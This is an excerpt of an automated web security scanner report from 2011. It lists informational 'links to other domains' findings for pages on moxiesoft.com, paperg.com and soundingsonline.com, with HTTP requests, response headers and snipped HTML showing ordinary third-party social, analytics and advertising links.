<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
<a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.319. http://www.moxiesoft.com/tal_products/chat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.moxiesoft.com/tal_products/chat.aspx?ac=PPC.B.live%20chat

The response contains the following links to other domains:

http://community.ngenera.com/
http://feeds.feedburner.com/MoxieBlog/
http://feeds.feedburner.com/MoxieSoft
http://members.ngenera.com/
http://ngencim.ngenera.com/netagent/proactive/proactive.aspx
http://twitter.com/moxiesoft
http://www.facebook.com/pages/Moxie-Software/144466498927860
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1072669760/?label=n2YjCIzh_QEQwMi-_wM&guid=ON&script=0
http://www.linkedin.com/companies/1229260
http://www.moxieinsight.com/
http://www.youtube.com/moxiesoft

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:58:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=elqucae4pira41q1xauy2i45; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; expires=Sat, 28-Jan-2012 13:58:55 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
   <link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />


   <script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072669760/?label=n2YjCIzh_QEQwMi-_wM&guid=ON&script=0"/>
</div>
...[SNIP]...

17.320. http://www.moxiesoft.com/tal_products/chat_tour2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat_tour2.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.moxiesoft.com/tal_products/chat_tour2.aspx?id=1436

The response contains the following links to other domains:

http://community.ngenera.com/
http://feeds.feedburner.com/MoxieBlog/
http://feeds.feedburner.com/MoxieSoft
http://members.ngenera.com/
http://twitter.com/moxiesoft
http://www.facebook.com/pages/Moxie-Software/144466498927860
http://www.linkedin.com/companies/1229260
http://www.moxieinsight.com/
http://www.youtube.com/moxiesoft

Request

GET /tal_products/chat_tour2.aspx?id=1436 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
<a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.321. http://www.moxiesoft.com/tal_resources/content.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_resources/content.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.moxiesoft.com/tal_resources/content.aspx?id=2852

The response contains the following links to other domains:

http://community.ngenera.com/
http://feeds.feedburner.com/MoxieBlog/
http://feeds.feedburner.com/MoxieSoft
http://members.ngenera.com/
http://twitter.com/moxiesoft
http://www.facebook.com/pages/Moxie-Software/144466498927860
http://www.linkedin.com/companies/1229260
http://www.moxieinsight.com/
http://www.youtube.com/moxiesoft

Request

GET /tal_resources/content.aspx?id=2852 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<link rel="alternate" type="application/rss+xml" title="Moxie Software Press Room Updates" href="http://feeds.feedburner.com/MoxieSoft" /><link rel="alternate" type="application/rss+xml" title="Subscribe to Our Moxie Blog" href="http://feeds.feedburner.com/MoxieBlog/" />

<!--
<script type="text/javascript" src="http://ngencim.ngenera.com/NetAgent/webcollab/includes/LoadFiles.aspx?file=wc.js">
...[SNIP]...
<td class="HeaderText"><a href="http://members.ngenera.com/">Member Login</a>
...[SNIP]...
<td class="HeaderText"><a href="http://www.moxieinsight.com/">Blog</a>
...[SNIP]...
<td class="HeaderText"><a href="http://community.ngenera.com/">Community</a>
...[SNIP]...
<li id="TM3">
<a href="http://www.moxieinsight.com/" title="Insight" target="_blank">Insight</a>
...[SNIP]...
</a>....|....<a title="visit our YouTube channel" href="http://www.youtube.com/moxiesoft" target="_blank"><img style="MARGIN-BOTTOM: -4px" title="visit our YouTube channel" border="0" alt="visit our YouTube channel" src="/tal_images/home4/youtube-logo.gif" width="38" height="15" /></a>..| ..<a title="visit us on Twitter" href="http://twitter.com/moxiesoft" target="_blank" border="0" align="absMiddle"><img title="visit us on Twitter" border="0" alt="visit us on Twitter" align="absMiddle" src="/uploadedImages/twitter.png" target="_blank" />
...[SNIP]...
</a> | <a title="visit us on LinkedIn" href="http://www.linkedin.com/companies/1229260" target="_blank" border="0" align="absMiddle" src="/uploadedImages/linkedin.gif" hspace="2"><img title="visit us on LinkedIn" border="0" hspace="2" alt="visit us on LinkedIn" align="middle" src="/uploadedImages/linkedin.gif" target="_blank" />
...[SNIP]...
</a> |..<a title="visit us on Facebook" href="http://www.facebook.com/pages/Moxie-Software/144466498927860" target="_blank" border="0" align="Middle" src="http://cim.ngenera.com/uploadedImages/facebook.jpg" hspace="2"><img title="visit us on Facebook" border="0" hspace="2" alt="visit us on Facebook" align="absMiddle" src="/uploadedImages/facebook.jpg" target="_blank" />
...[SNIP]...
</a>..|..<a href="http://feeds.feedburner.com/MoxieSoft" target="_blank"><img title="RSS Feed" border="0" alt="RSS Feed" align="absMiddle" src="/uploadedImages/rss.gif" width="18" height="15" />
...[SNIP]...

17.322. https://www.paperg.com/post.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The page was loaded from a URL containing a query string:

https://www.paperg.com/post.php?bid=2123&pid=3922&post

The response contains the following links to other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
https://ssl.google-analytics.com/urchin.js

Request

Response

17.323. http://www.soundingsonline.com/component/chronocontact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The page was loaded from a URL containing a query string:

http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage

The response contains the following links to other domains:

http://b.collective-media.net/seg/cm/de18_1
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://www.barkerstores.com/soundings
http://www.barkerstores.com/soundings/
http://www.chronoengine.com/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.paperg.com/
http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
http://www.soundingssellmyboat.com/

Request

GET /component/chronocontact/?chronoformname=PSPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

17.324. http://www.soundingsonline.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111

The response contains the following links to other domains:

http://b.collective-media.net/seg/cm/de18_1
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://www.barkerstores.com/soundings
http://www.barkerstores.com/soundings/
http://www.boats.com/
http://www.boattrader.com/
http://www.buybooks.ws/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.paperg.com/
http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
http://www.soundingssellmyboat.com/
http://www.yachtworld.com/

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<div style="width:150px; height:1px; padding:0px; font:11px Tahoma; overflow:hidden;"><a href="http://www.buybooks.ws/" title="Ebooks buy">Ebooks buy</A>
...[SNIP]...
<td style="text-align: left;"><a href="http://www.boats.com"><img src="/images/buttons/boatscom.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.boattrader.com"><img src="/images/buttons/boattrader.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.yachtworld.com"><img style="border: medium none; float: right;" src="/images/buttons/yachtworld.jpg" />
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

17.325. http://www.soundingsonline.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.soundingsonline.com/index.php?option=com_chronocontact&chronoformname=CGPage

The response contains the following links to other domains:

http://b.collective-media.net/seg/cm/de18_1
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://www.barkerstores.com/soundings
http://www.barkerstores.com/soundings/
http://www.chronoengine.com/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.paperg.com/
http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
http://www.soundingspub.com/images/cgaux_graphics/cgaux.gif
http://www.soundingssellmyboat.com/

Request

GET /index.php?option=com_chronocontact&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
